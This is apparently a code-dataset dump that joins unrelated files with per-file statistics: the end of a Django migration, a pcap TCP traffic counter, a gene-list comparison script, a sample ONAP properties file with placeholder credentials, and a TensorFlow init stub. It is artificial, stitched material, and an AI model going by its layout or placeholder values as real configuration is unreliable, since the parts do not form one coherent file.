('comm_partner', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='partners.CommunityPartner')),
('end_acad_year', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='projects.AcademicYear')),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('start_acad_year', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='projects.AcademicYear')),
],
options={
'verbose_name': 'historical CEC Building Partner Active Year',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='CecPartActiveYrs',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('start_semester', models.CharField(blank=True, choices=[('', '----------'), ('Fall', 'Fall'), ('Spring', 'Spring'), ('Summer', 'Summer')], max_length=20)),
('end_semester', models.CharField(blank=True, choices=[('', '----------'), ('Fall', 'Fall'), ('Spring', 'Spring'), ('Summer', 'Summer')], max_length=20)),
('camp_partner', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='partners.CampusPartner')),
('comm_partner', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='partners.CommunityPartner')),
('end_acad_year', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='cec_academic_year2', to='projects.AcademicYear')),
('start_acad_year', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cec_academic_year1', to='projects.AcademicYear')),
],
options={
'verbose_name': 'CEC Building Partner Active Year',
'verbose_name_plural': 'CEC Building Partner Active Year',
},
),
migrations.AddField(
model_name='campuspartner',
name='cec_partner_status',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='partners.CecPartnerStatus', verbose_name='Campus CEC Partner Status'),
),
migrations.AddField(
model_name='campuspartner',
name='partner_status',
field=models.ForeignKey(max_length=30, null=True, on_delete=django.db.models.deletion.SET_NULL, to='partners.PartnerStatus', verbose_name='Campus Partner Status'),
),
migrations.AddField(
model_name='communitypartner',
name='cec_partner_status',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='partners.CecPartnerStatus', verbose_name='Community CEC Partner Status'),
),
migrations.AddField(
model_name='communitypartner',
name='partner_status',
field=models.ForeignKey(max_length=30, null=True, on_delete=django.db.models.deletion.SET_NULL, to='partners.PartnerStatus', verbose_name='Community Partner Status'),
),
migrations.AddField(
model_name='historicalcampuspartner',
name='cec_partner_status',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='partners.CecPartnerStatus', verbose_name='Campus CEC Partner Status'),
),
migrations.AddField(
model_name='historicalcampuspartner',
name='partner_status',
field=models.ForeignKey(blank=True, db_constraint=False, max_length=30, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='partners.PartnerStatus', verbose_name='Campus Partner Status'),
),
migrations.AddField(
model_name='historicalcommunitypartner',
name='cec_partner_status',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='partners.CecPartnerStatus', verbose_name='Community CEC Partner Status'),
),
migrations.AddField(
model_name='historicalcommunitypartner',
name='partner_status',
field=models.ForeignKey(blank=True, db_constraint=False, max_length=30, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='partners.PartnerStatus', verbose_name='Community Partner Status'),
),
]
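# For reference, a hedged sketch of the model-side declaration that produces
# Historical* tables like those above via django-simple-history (field names
# taken from the CreateModel entries; placement here is illustrative only):
#
#     from django.db import models
#     from simple_history.models import HistoricalRecords
#
#     class PartnerStatus(models.Model):
#         name = models.CharField(max_length=80, unique=True)
#         description = models.CharField(blank=True, max_length=255, null=True)
#         history = HistoricalRecords()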
| 54.668
| 231
| 0.612863
| 1,351
| 13,667
| 6.013323
| 0.105107
| 0.040374
| 0.059084
| 0.070901
| 0.917898
| 0.893033
| 0.853028
| 0.841827
| 0.806745
| 0.77708
| 0
| 0.013104
| 0.246214
| 13,667
| 249
| 232
| 54.88755
| 0.77548
| 0.003293
| 0
| 0.790123
| 1
| 0
| 0.211674
| 0.070778
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.016461
| 0
| 0.028807
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
561935427c27ae30579fecbb246c47173f787c12
| 2,963
|
py
|
Python
|
Networks Lab-04/Scripts-Data-Graphs/CodesToGenerateData/tcp_ack_seg.py
|
hareeshreddi/Computer-Networks-Lab-Assignments
|
c86665a4fb673fd53b636f552e02e6d06c94ba22
|
[
"MIT"
] | 6
|
2018-02-02T19:07:49.000Z
|
2021-09-05T12:17:20.000Z
|
Networks Lab-04/Scripts-Data-Graphs/CodesToGenerateData/tcp_ack_seg.py
|
hareeshreddi/Computer-Networks-Lab-Assignments
|
c86665a4fb673fd53b636f552e02e6d06c94ba22
|
[
"MIT"
] | null | null | null |
Networks Lab-04/Scripts-Data-Graphs/CodesToGenerateData/tcp_ack_seg.py
|
hareeshreddi/Computer-Networks-Lab-Assignments
|
c86665a4fb673fd53b636f552e02e6d06c94ba22
|
[
"MIT"
] | 14
|
2019-01-09T14:05:36.000Z
|
2021-02-01T09:07:18.000Z
|
import sys
import dpkt
import struct
import socket
l = ['0','256','512','1000']
i=0
out=open('tcp_ack_ap.txt','w')
out1=open('tcp_seg_ap.txt','w')
while i < len(l):
ele1=l[i]
filename = 'assignment-4-data/'+ele1+'/AccessPoint-1-0.pcap'
f = open(filename, 'rb')  # pcap parsing needs binary mode
print f
pcap=dpkt.pcap.Reader(f)
frame_tcp_ack=0
frame_tcp_seg=0
frame_tcp_Ack_total=0
frame_tcp_seg_total=0
if 1 :
for ts,data in pcap:
buf_radiotap=dpkt.radiotap.Radiotap(data)
buf_radiotap_len=socket.ntohs(buf_radiotap.length)
wlan=dpkt.ieee80211.IEEE80211(data[buf_radiotap_len:])
try:
tcp=dpkt.tcp.TCP(wlan.data)
if(tcp.flags & dpkt.tcp.TH_ACK) != 0:
frame_tcp_ack += 1
frame_tcp_Ack_total += len(data)
if len(tcp.data) >0 :
frame_tcp_seg += 1
frame_tcp_seg_total += len(data)
except dpkt.Error:
pass  # skip frames that do not parse as TCP
x1 = (frame_tcp_Ack_total*8.00)/(1024*1024*50)
x2 = (frame_tcp_seg_total*8.00)/(1024*1024*50)
out.write(ele1+' '+str(x1)+'\n')
out1.write(ele1+' '+str(x2)+'\n')
i += 1
out.close()
out1.close()
out=open('tcp_ack_sta1.txt','w')
out1=open('tcp_seg_sta1.txt','w')
i = 0
while i < len(l):
ele2=l[i]
filename = 'assignment-4-data/'+ele2+'/Station-0-0.pcap'
f = open(filename, 'rb')
print f
pcap=dpkt.pcap.Reader(f)
frame_tcp_ack=0
frame_tcp_seg=0
frame_tcp_Ack_total=0
frame_tcp_seg_total=0
if 1 :
for ts,data in pcap:
buf_radiotap=dpkt.radiotap.Radiotap(data)
buf_radiotap_len=socket.ntohs(buf_radiotap.length)
wlan=dpkt.ieee80211.IEEE80211(data[buf_radiotap_len:])
try:
tcp=dpkt.tcp.TCP(wlan.data)
if(tcp.flags & dpkt.tcp.TH_ACK) != 0:
frame_tcp_ack += 1
frame_tcp_Ack_total += len(data)
if len(tcp.data) >0 :
frame_tcp_seg += 1
frame_tcp_seg_total += len(data)
except dpkt.Error:
pass  # skip frames that do not parse as TCP
x1 = (frame_tcp_Ack_total*8.00)/(1024*1024*50)
x2 = (frame_tcp_seg_total*8.00)/(1024*1024*50)
out.write(ele2+' '+str(x1)+'\n')
out1.write(ele2+' '+str(x2)+'\n')
i += 1
out.close()
out1.close()
out=open('tcp_ack_sta2.txt','w')
out1=open('tcp_seg_sta2.txt','w')
i = 0
while i < len(l):
ele3=l[i]
filename = 'assignment-4-data/'+ele3+'/Station-2-0.pcap'
f = open(filename, 'rb')
print f
pcap=dpkt.pcap.Reader(f)
frame_tcp_ack=0
frame_tcp_seg=0
frame_tcp_Ack_total=0
frame_tcp_seg_total=0
if 1 :
for ts,data in pcap:
buf_radiotap=dpkt.radiotap.Radiotap(data)
buf_radiotap_len=socket.ntohs(buf_radiotap.length)
wlan=dpkt.ieee80211.IEEE80211(data[buf_radiotap_len:])
try:
tcp=dpkt.tcp.TCP(wlan.data)
if(tcp.flags & dpkt.tcp.TH_ACK) != 0:
#print("a")
frame_tcp_ack += 1
frame_tcp_Ack_total += len(data)
if len(tcp.data) >0 :
frame_tcp_seg += 1
frame_tcp_seg_total += len(data)
except dpkt.Error:
pass  # skip frames that do not parse as TCP
x1 = (frame_tcp_Ack_total*8.00)/(1024*1024*50)
x2 = (frame_tcp_seg_total*8.00)/(1024*1024*50)
out.write(ele3+' '+str(x1)+'\n')
out1.write(ele3+' '+str(x2)+'\n')
i += 1
out.close()
out1.close()
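# The three while-loops above differ only in the trace filename and the
# output files. A hedged refactor of the shared accounting (same radiotap
# length workaround, same dpkt.Error handling, and the same 50-second
# normalisation; uses the modules already imported at the top):
def count_tcp_traffic(path):
    ack_bits = seg_bits = 0.0
    with open(path, 'rb') as f:
        for ts, data in dpkt.pcap.Reader(f):
            rt = dpkt.radiotap.Radiotap(data)
            wlan = dpkt.ieee80211.IEEE80211(data[socket.ntohs(rt.length):])
            try:
                tcp = dpkt.tcp.TCP(wlan.data)
            except dpkt.Error:
                continue
            if (tcp.flags & dpkt.tcp.TH_ACK) != 0:
                ack_bits += len(data) * 8.0
                if len(tcp.data) > 0:
                    seg_bits += len(data) * 8.0
    norm = 1024 * 1024 * 50  # Mbit over the 50 s capture window
    return ack_bits / norm, seg_bits / norm
# e.g.: x1, x2 = count_tcp_traffic('assignment-4-data/0/AccessPoint-1-0.pcap')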
| 22.44697
| 61
| 0.669929
| 537
| 2,963
| 3.489758
| 0.132216
| 0.128068
| 0.088047
| 0.057631
| 0.901814
| 0.877801
| 0.808965
| 0.808965
| 0.791889
| 0.778549
| 0
| 0.079824
| 0.158623
| 2,963
| 132
| 62
| 22.44697
| 0.671881
| 0.003375
| 0
| 0.790909
| 0
| 0
| 0.079919
| 0.007111
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.036364
| null | null | 0.027273
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
564ea568b5cdb7312f18c45d273886d4bc9cdcbf
| 5,926
|
py
|
Python
|
assignments/hw4/codes/hw4a/gene_comp.py
|
sowmyamanojna/BT5240-Computational-Systems-Biology
|
fe7562de26991cd096c2d27603e85a2408f71752
|
[
"MIT"
] | null | null | null |
assignments/hw4/codes/hw4a/gene_comp.py
|
sowmyamanojna/BT5240-Computational-Systems-Biology
|
fe7562de26991cd096c2d27603e85a2408f71752
|
[
"MIT"
] | null | null | null |
assignments/hw4/codes/hw4a/gene_comp.py
|
sowmyamanojna/BT5240-Computational-Systems-Biology
|
fe7562de26991cd096c2d27603e85a2408f71752
|
[
"MIT"
] | null | null | null |
gal_sgd = ['HP0370', 'HP0950', 'HP0371', 'HP0557', 'HP0202', 'HP0587', 'HP0618', 'HP1112', 'HP0255', 'HP0859', 'HP0089', 'HP0106', 'HP0738', 'HP0942', 'HP0976', 'HP1483', 'HP1280', 'HP1281', 'HP1282', 'HP0598', 'HP1505', 'HP0422', 'HP1399', 'HP1017', 'HP1189', 'HP0723', 'HP0034', 'HP1084', 'HP1229', 'HP0672', 'HP1406', 'HP1376', 'HP0558', 'HP0195', 'HP0561', 'HP1237', 'HP0919', 'HP1443', 'HP0291', 'HP0663', 'HP0349', 'HP0107', 'HP0290', 'HP0566', 'HP0215', 'HP0804', 'HP0029', 'HP0134', 'HP0321', 'HP0510', 'HP1013', 'HP1545', 'HP1510', 'HP1011', 'HP0266', 'HP0581', 'HP1232', 'HP1038', 'HP0283', 'HP0929', 'HP0400', 'HP1228', 'HP0831', 'HP1474', 'HP0216', 'HP0354', 'HP0642', 'HP1161', 'HP1087', 'HP0577', 'HP0683', 'HP0961', 'HP1532', 'HP0045', 'HP0183', 'HP0512', 'HP1491', 'HP0549', 'HP0509', 'HP0044', 'HP0858', 'HP0860', 'HP0409', 'HP0928', 'HP0802', 'HP1158', 'HP0822', 'HP1050', 'HP1279', 'HP1468', 'HP1275', 'HP0829', 'HP0230', 'HP0003', 'HP0867', 'HP0279', 'HP0043', 'HP0090', 'HP0086', 'HP0625', 'HP1020', 'HP0197', 'HP0957', 'HP1058', 'HP1394', 'HP0329', 'HP0198', 'HP1337', 'HP1355', 'HP0240', 'HP0005', 'HP0588', 'HP0590', 'HP0589', 'HP0591', 'HP1257', 'HP0293', 'HP0006', 'HP0493', 'HP1348', 'HP1111', 'HP1109', 'HP1108', 'HP1110', 'HP0075', 'HP0096', 'HP0397', 'HP0737', 'HP1016', 'HP0620', 'HP1380', 'HP1218', 'HP0742', 'HP0401', 'HP1357', 'HP0736', 'HP0652', 'HP1071', 'HP1475', 'HP1356', 'HP0002', 'HP1574', 'HP0105', 'HP0680', 'HP0364', 'HP0574', 'HP0857', 'HP0212', 'HP0624', 'HP1210', 'HP1249', 'HP0157', 'HP0832', 'HP0626', 'HP0098', 'HP1088', 'HP1533', 'HP0194', 'HP1458', 'HP0825', 'HP0824', 'HP1164', 'HP1277', 'HP1278', 'HP0196', 'HP1494', 'HP1375', 'HP0648', 'HP1155', 'HP0494', 'HP0623', 'HP1418', 'HP0740', 'HP1052', 'HP0777']
glu_sgd = ['HP0370', 'HP0950', 'HP0371', 'HP0557', 'HP0202', 'HP0587', 'HP0618', 'HP1112', 'HP0255', 'HP0859', 'HP0089', 'HP0106', 'HP0738', 'HP0942', 'HP0976', 'HP1483', 'HP1280', 'HP1281', 'HP1282', 'HP0598', 'HP1505', 'HP0422', 'HP1399', 'HP1017', 'HP1189', 'HP0723', 'HP0034', 'HP1084', 'HP1229', 'HP0672', 'HP1406', 'HP1376', 'HP0558', 'HP0195', 'HP0561', 'HP1237', 'HP0919', 'HP1443', 'HP0291', 'HP0663', 'HP0349', 'HP0107', 'HP0290', 'HP0566', 'HP0215', 'HP0804', 'HP0029', 'HP0134', 'HP0321', 'HP0510', 'HP1013', 'HP1545', 'HP1510', 'HP1011', 'HP0266', 'HP0581', 'HP1232', 'HP1038', 'HP0283', 'HP0929', 'HP0400', 'HP1228', 'HP0831', 'HP1474', 'HP0216', 'HP0354', 'HP0642', 'HP1161', 'HP1087', 'HP0577', 'HP0683', 'HP0961', 'HP0646', 'HP1532', 'HP0045', 'HP0183', 'HP0512', 'HP1491', 'HP0549', 'HP0509', 'HP0044', 'HP0858', 'HP0860', 'HP0409', 'HP0928', 'HP0802', 'HP1158', 'HP0822', 'HP1050', 'HP1279', 'HP1468', 'HP1275', 'HP0829', 'HP0230', 'HP0003', 'HP0867', 'HP0279', 'HP0043', 'HP0090', 'HP0086', 'HP0625', 'HP1020', 'HP0197', 'HP0957', 'HP1058', 'HP1394', 'HP0329', 'HP0198', 'HP1337', 'HP1355', 'HP0240', 'HP0005', 'HP0588', 'HP0590', 'HP0589', 'HP0591', 'HP1257', 'HP0293', 'HP0006', 'HP0493', 'HP1348', 'HP1111', 'HP1109', 'HP1108', 'HP1110', 'HP0075', 'HP0096', 'HP0397', 'HP0737', 'HP1016', 'HP0620', 'HP1380', 'HP1218', 'HP0742', 'HP0401', 'HP1357', 'HP0736', 'HP0652', 'HP1071', 'HP1475', 'HP1356', 'HP0002', 'HP1574', 'HP0105', 'HP0680', 'HP0364', 'HP0574', 'HP0857', 'HP0212', 'HP0624', 'HP1210', 'HP1249', 'HP0157', 'HP0832', 'HP0626', 'HP0098', 'HP1088', 'HP1533', 'HP0194', 'HP1458', 'HP0825', 'HP0824', 'HP1164', 'HP1277', 'HP1278', 'HP0196', 'HP1494', 'HP1375', 'HP0648', 'HP1155', 'HP0494', 'HP0623', 'HP1418', 'HP0360', 'HP0740', 'HP1052', 'HP0777']
sgd = ['HP0370', 'HP0950', 'HP0371', 'HP0557', 'HP0202', 'HP0587', 'HP0618', 'HP1112', 'HP0255', 'HP0859', 'HP0089', 'HP0106', 'HP0738', 'HP0942', 'HP0976', 'HP1483', 'HP1280', 'HP1281', 'HP1282', 'HP0598', 'HP1505', 'HP0422', 'HP1399', 'HP1017', 'HP1189', 'HP0723', 'HP0034', 'HP1084', 'HP1229', 'HP0672', 'HP1539', 'HP1227', 'HP1538', 'HP1540', 'HP1406', 'HP1376', 'HP0558', 'HP0195', 'HP0561', 'HP1237', 'HP0919', 'HP1443', 'HP0291', 'HP0663', 'HP0349', 'HP0147', 'HP0144', 'HP0145', 'HP0146', 'HP0107', 'HP0290', 'HP0566', 'HP0215', 'HP0804', 'HP0029', 'HP0134', 'HP0321', 'HP0510', 'HP1013', 'HP1545', 'HP1510', 'HP1011', 'HP0266', 'HP0581', 'HP1232', 'HP1038', 'HP0283', 'HP0929', 'HP0400', 'HP1228', 'HP0831', 'HP1474', 'HP0216', 'HP0354', 'HP0154', 'HP0176', 'HP1385', 'HP0642', 'HP1161', 'HP1087', 'HP0577', 'HP0683', 'HP0961', 'HP0646', 'HP1532', 'HP0045', 'HP0183', 'HP0512', 'HP1491', 'HP0549', 'HP0509', 'HP0044', 'HP0858', 'HP0860', 'HP0409', 'HP0928', 'HP0802', 'HP1158', 'HP0822', 'HP1050', 'HP1279', 'HP1468', 'HP1275', 'HP0829', 'HP0230', 'HP0003', 'HP0867', 'HP0279', 'HP0043', 'HP0090', 'HP0086', 'HP0625', 'HP1020', 'HP0197', 'HP0957', 'HP1058', 'HP1394', 'HP0329', 'HP0198', 'HP1337', 'HP1355', 'HP0240', 'HP0005', 'HP0588', 'HP0590', 'HP0589', 'HP0591', 'HP1257', 'HP0293', 'HP0006', 'HP0493', 'HP1348', 'HP1111', 'HP1109', 'HP1108', 'HP1110', 'HP0075', 'HP0096', 'HP0397', 'HP1166', 'HP1345', 'HP0974', 'HP0737', 'HP1016', 'HP0620', 'HP1380', 'HP0121', 'HP1218', 'HP0742', 'HP0401', 'HP1357', 'HP0736', 'HP0652', 'HP1071', 'HP1475', 'HP1356', 'HP0002', 'HP1574', 'HP0105', 'HP0680', 'HP0364', 'HP0574', 'HP0857', 'HP0212', 'HP0624', 'HP1210', 'HP1249', 'HP0157', 'HP0832', 'HP0389', 'HP0626', 'HP0098', 'HP1088', 'HP1533', 'HP0194', 'HP1458', 'HP0825', 'HP0824', 'HP1164', 'HP1277', 'HP1278', 'HP0196', 'HP1494', 'HP1375', 'HP0648', 'HP1155', 'HP0494', 'HP0623', 'HP1418', 'HP0360', 'HP0740', 'HP1052', 'HP0777']
m = len(glu_sgd)
n = len(gal_sgd)
w = len(sgd)
# Glucose and galactose comparison
print("\nGlucose and galactose comparison mismatch")
i = j = 0
while i < m and j < n:
if glu_sgd[i] != gal_sgd[j]:
print(glu_sgd[i])
i += 1
else:
i += 1
j += 1
# WT and Glucose comparison
print("\nWT and Glucose comparison mismatch")
i = j = 0
while i < w and j < m:
if sgd[i] != glu_sgd[j]:
print(sgd[i])  # the unmatched entry comes from the WT list here
i += 1
else:
i += 1
j += 1
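# The positional scans above only stay aligned while the lists share a
# common ordering; a set-based sketch of the same comparisons that is
# order-independent:
print("\nIn glucose but not in galactose: %s" % sorted(set(glu_sgd) - set(gal_sgd)))
print("In galactose but not in glucose: %s" % sorted(set(gal_sgd) - set(glu_sgd)))
print("In WT but not in glucose: %s" % sorted(set(sgd) - set(glu_sgd)))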
| 191.16129
| 1,936
| 0.600405
| 634
| 5,926
| 5.597792
| 0.340694
| 0.010144
| 0.01268
| 0.017751
| 0.915469
| 0.915469
| 0.915469
| 0.89969
| 0.89969
| 0.89969
| 0
| 0.415496
| 0.111374
| 5,926
| 30
| 1,937
| 197.533333
| 0.25845
| 0.010125
| 0
| 0.5
| 0
| 0
| 0.57155
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.166667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
5657e77a52d02570cfa7d84d7e805ca65861e372
| 3,775
|
py
|
Python
|
sample_vm_properties.py
|
onapdemo/testsuite-properties
|
daae856bbb5bf2b21812f764113088180de5016e
|
[
"Apache-2.0"
] | null | null | null |
sample_vm_properties.py
|
onapdemo/testsuite-properties
|
daae856bbb5bf2b21812f764113088180de5016e
|
[
"Apache-2.0"
] | null | null | null |
sample_vm_properties.py
|
onapdemo/testsuite-properties
|
daae856bbb5bf2b21812f764113088180de5016e
|
[
"Apache-2.0"
] | null | null | null |
# This is not for real use!
# This is normally generated by the build and install so should not be used for anything or filled in with real values.
# File generated from /opt/config
#
GLOBAL_INJECTED_AAI1_IP_ADDR = "10.0.1.1"
GLOBAL_INJECTED_AAI2_IP_ADDR = "10.0.1.2"
GLOBAL_INJECTED_APPC_IP_ADDR = "10.0.2.1"
GLOBAL_INJECTED_ARTIFACTS_VERSION = "1.2.0"
GLOBAL_INJECTED_CLAMP_IP_ADDR = "10.0.12.1"
GLOBAL_INJECTED_CLOUD_ENV = "openstack"
GLOBAL_INJECTED_DCAE_IP_ADDR = "10.0.4.1"
GLOBAL_INJECTED_DNS_IP_ADDR = "10.0.100.1"
GLOBAL_INJECTED_DOCKER_VERSION = "1.1-STAGING-latest"
GLOBAL_INJECTED_EXTERNAL_DNS = "8.8.8.8"
GLOBAL_INJECTED_GERRIT_BRANCH = "amsterdam"
GLOBAL_INJECTED_KEYSTONE = "http://10.12.25.2:5000"
GLOBAL_INJECTED_MR_IP_ADDR = "10.0.11.1"
GLOBAL_INJECTED_MSO_IP_ADDR = "10.0.5.1"
GLOBAL_INJECTED_NETWORK = "oam_onap_wbaL"
GLOBAL_INJECTED_NEXUS_DOCKER_REPO = "10.12.5.2:5000"
GLOBAL_INJECTED_NEXUS_PASSWORD = "anonymous"
GLOBAL_INJECTED_NEXUS_REPO = "https://nexus.onap.org/content/sites/raw"
GLOBAL_INJECTED_NEXUS_USERNAME = "username"
GLOBAL_INJECTED_OPENO_IP_ADDR = "10.0.14.1"
GLOBAL_INJECTED_OPENSTACK_PASSWORD = "password"
GLOBAL_INJECTED_OPENSTACK_TENANT_ID = "000007144004bacac1e39ff23105fff"
GLOBAL_INJECTED_OPENSTACK_USERNAME = "username"
GLOBAL_INJECTED_POLICY_IP_ADDR = "10.0.6.1"
GLOBAL_INJECTED_PORTAL_IP_ADDR = "10.0.9.1"
GLOBAL_INJECTED_PUBLIC_NET_ID = "971040b2-7059-49dc-b220-4fab50cb2ad4"
GLOBAL_INJECTED_REGION = "RegionOne"
GLOBAL_INJECTED_REMOTE_REPO = "http://gerrit.onap.org/r/testsuite/properties.git"
GLOBAL_INJECTED_SCRIPT_VERSION = "1.1.1"
GLOBAL_INJECTED_SDC_IP_ADDR = "10.0.3.1"
GLOBAL_INJECTED_SDNC_IP_ADDR = "10.0.7.1"
GLOBAL_INJECTED_SO_IP_ADDR = "10.0.5.1"
GLOBAL_INJECTED_VID_IP_ADDR = "10.0.8.1"
GLOBAL_INJECTED_VM_FLAVOR = "m1.medium"
GLOBAL_INJECTED_UBUNTU_1404_IMAGE = "ubuntu-14-04-cloud-amd64"
GLOBAL_INJECTED_UBUNTU_1604_IMAGE = "ubuntu-16-04-cloud-amd64"
GLOBAL_INJECTED_PROPERTIES = {
"GLOBAL_INJECTED_AAI1_IP_ADDR" : "10.0.1.1",
"GLOBAL_INJECTED_AAI2_IP_ADDR" : "10.0.1.2",
"GLOBAL_INJECTED_APPC_IP_ADDR" : "10.0.2.1",
"GLOBAL_INJECTED_ARTIFACTS_VERSION" : "1.2.0",
"GLOBAL_INJECTED_CLAMP_IP_ADDR" : "10.0.12.1",
"GLOBAL_INJECTED_CLOUD_ENV" : "openstack",
"GLOBAL_INJECTED_DCAE_IP_ADDR" : "10.0.4.1",
"GLOBAL_INJECTED_DNS_IP_ADDR" : "10.0.100.1",
"GLOBAL_INJECTED_DOCKER_VERSION" : "1.1-STAGING-latest",
"GLOBAL_INJECTED_EXTERNAL_DNS" : "8.8.8.8",
"GLOBAL_INJECTED_GERRIT_BRANCH" : "amsterdam",
"GLOBAL_INJECTED_KEYSTONE" : "http://10.12.25.2:5000",
"GLOBAL_INJECTED_MR_IP_ADDR" : "10.0.11.1",
"GLOBAL_INJECTED_MSO_IP_ADDR" : "10.0.5.1",
"GLOBAL_INJECTED_NETWORK" : "oam_onap_wbaL",
"GLOBAL_INJECTED_NEXUS_DOCKER_REPO" : "10.12.5.2:5000",
"GLOBAL_INJECTED_NEXUS_PASSWORD" : "username",
"GLOBAL_INJECTED_NEXUS_REPO" : "https://nexus.onap.org/content/sites/raw",
"GLOBAL_INJECTED_NEXUS_USERNAME" : "username",
"GLOBAL_INJECTED_OPENO_IP_ADDR" : "10.0.14.1",
"GLOBAL_INJECTED_OPENSTACK_PASSWORD" : "password",
"GLOBAL_INJECTED_OPENSTACK_TENANT_ID" : "000007144004bacac1e39ff23105fff",
"GLOBAL_INJECTED_OPENSTACK_USERNAME" : "demo",
"GLOBAL_INJECTED_POLICY_IP_ADDR" : "10.0.6.1",
"GLOBAL_INJECTED_PORTAL_IP_ADDR" : "10.0.9.1",
"GLOBAL_INJECTED_PUBLIC_NET_ID" : "971040b2-7059-49dc-b220-4fab50cb2ad4",
"GLOBAL_INJECTED_REGION" : "RegionOne",
"GLOBAL_INJECTED_REMOTE_REPO" : "http://gerrit.onap.org/r/testsuite/properties.git",
"GLOBAL_INJECTED_SCRIPT_VERSION" : "1.1.1",
"GLOBAL_INJECTED_SDC_IP_ADDR" : "10.0.3.1",
"GLOBAL_INJECTED_SDNC_IP_ADDR" : "10.0.7.1",
"GLOBAL_INJECTED_SO_IP_ADDR" : "10.0.5.1",
"GLOBAL_INJECTED_VID_IP_ADDR" : "10.0.8.1",
"GLOBAL_INJECTED_VM_FLAVOR" : "m1.medium",
"GLOBAL_INJECTED_UBUNTU_1404_IMAGE" : "ubuntu-14-04-cloud-amd64",
"GLOBAL_INJECTED_UBUNTU_1604_IMAGE" : "ubuntu-16-04-cloud-amd64"}
| 47.78481
| 119
| 0.793377
| 614
| 3,775
| 4.460912
| 0.19544
| 0.373129
| 0.087623
| 0.098576
| 0.934648
| 0.929536
| 0.929536
| 0.929536
| 0.929536
| 0.929536
| 0
| 0.10054
| 0.067285
| 3,775
| 78
| 120
| 48.397436
| 0.677364
| 0.046358
| 0
| 0
| 1
| 0
| 0.553547
| 0.350765
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.054795
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
8e778bd172ed7802dec52dba84bd357874cda90a
| 136
|
py
|
Python
|
tensorflow/python/ops/structured/__init__.py
|
abhaikollara/tensorflow
|
4f96df3659696990cb34d0ad07dc67843c4225a9
|
[
"Apache-2.0"
] | 78
|
2020-08-04T12:36:25.000Z
|
2022-03-25T04:23:40.000Z
|
tensorflow/python/ops/structured/__init__.py
|
sseung0703/tensorflow
|
be084bd7a4dd241eb781fc704f57bcacc5c9b6dd
|
[
"Apache-2.0"
] | 1,056
|
2019-12-15T01:20:31.000Z
|
2022-02-10T02:06:28.000Z
|
tensorflow/python/ops/structured/__init__.py
|
sseung0703/tensorflow
|
be084bd7a4dd241eb781fc704f57bcacc5c9b6dd
|
[
"Apache-2.0"
] | 66
|
2020-05-15T10:05:12.000Z
|
2022-02-14T07:28:18.000Z
|
"""Structured Tensors."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
| 22.666667
| 38
| 0.838235
| 16
| 136
| 6.25
| 0.5625
| 0.3
| 0.48
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.110294
| 136
| 5
| 39
| 27.2
| 0.826446
| 0.139706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.333333
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8e9ea78512a9ffde0002fe841ea79c92368a4850
| 305
|
py
|
Python
|
codigo/Live34/errors/test.py
|
cassiasamp/live-de-python
|
